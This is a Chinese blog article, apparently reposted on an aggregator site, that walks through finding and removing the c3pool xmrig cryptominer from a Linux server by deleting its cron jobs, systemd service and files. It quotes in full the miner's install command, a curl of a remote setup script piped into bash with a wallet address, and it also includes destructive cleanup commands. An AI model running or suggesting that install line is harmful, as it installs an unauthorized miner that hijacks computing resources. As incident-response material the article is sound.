热门标签
热门文章
- 1springboot快速启动_project 'org.springframework.boot:spring-boot-star
- 22013年下半年c语言真题及答案,2013年10月自考04737C++程序设计真题及答案
- 3axios携带cookie配置详解(axios+koa)_axios怎么在cookie里面配参数
- 4RabbitMQ访问Web端口报错User can only log in via localhost
- 5如何在MATLAB中创建和操作矩阵?_matlab建立一个m×n的矩阵
- 6GitHub上非常火热的开源低代码开发平台:ILLA Builder,接近1万star!快速构建内部工具的利器_低代码开发平台 开源
- 7MySQL入门到精通——基础篇(基础篇——进阶篇——运维篇)本文以MySQL8.0版本以上为例_mysql8.0 从入门到精通
- 8YOLO系列总结:YOLOv1, YOLOv2, YOLOv3, YOLOv4, YOLOv5, YOLOX
- 9yolov5训练加速_yolov5 提前resize
- 10nlp入门之nltk_nltk(英文分词)
当前位置: article > 正文
【安全】查杀linux上c3pool挖矿病毒xmrig_/root/c3pool/xmrig
作者:菜鸟追梦旅行 | 2024-05-01 23:51:12
赞
踩
/root/c3pool/xmrig
挖矿平台:猫池
病毒来源安装脚本
cat /root/c3pool/config.json
crontab -r
cd /root/c3pool
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 44SLpuV4U7gB6RNZMCweHxWug7b1YUir4jLr3RBaVX33QxjJdzzcMA2bvwo6P4i6AxZjzsh227W3SjodscE45xFD7iXuW12
- 1
- 2
- 3
- 4
- 5
- 6
旷池提供的卸载脚本
curl -s -L http://download.c3pool.com/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
- 1
中毒现象
高cpu和高内存占用
kill -9 杀掉之后自动重启
进程ip:47.76.163.177 为美国IP,IP查询
查杀过程
查找病毒脚本位置find / -name xmrig
检查是否有相关的定时任务
crontab -l
- 1
如果有定时任务则删除掉
find / -name cron* -type d
- 1
查找自启动服务
因为kill -9杀掉进程之后会立即重启,需找到自启动服务,禁用后删除
systemctl list-units --type=service
- 1
find / -name c3pool_miner.service
- 1
找到所有相关的服务,全部删除
# 关闭自启动
systemctl disable c3pool_miner.service
# 停止服务
systemctl stop c3pool_miner.service
# 删除服务
rm -f /etc/systemd/system/c3pool_miner.service
- 1
- 2
- 3
- 4
- 5
- 6
最后将脚本文件删除
rm -rf /root/c3pool/
- 1
【安全】查杀linux上c3pool挖矿病毒xmrig
【安全】查杀linux挖矿病毒 kswapd0
【安全】查杀linux隐藏挖矿病毒rcu_tasked
【安全】挖矿木马自助清理手册
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/521124
推荐阅读
相关标签
